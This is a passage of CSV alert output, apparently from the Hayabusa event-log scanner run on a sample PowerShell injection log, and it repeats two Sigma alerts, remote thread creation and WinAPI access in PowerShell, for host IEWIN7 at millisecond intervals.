Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
